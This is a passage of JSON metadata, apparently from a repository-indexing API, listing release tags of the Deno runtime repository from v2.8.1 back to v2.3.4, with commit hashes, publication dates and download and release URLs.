ub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4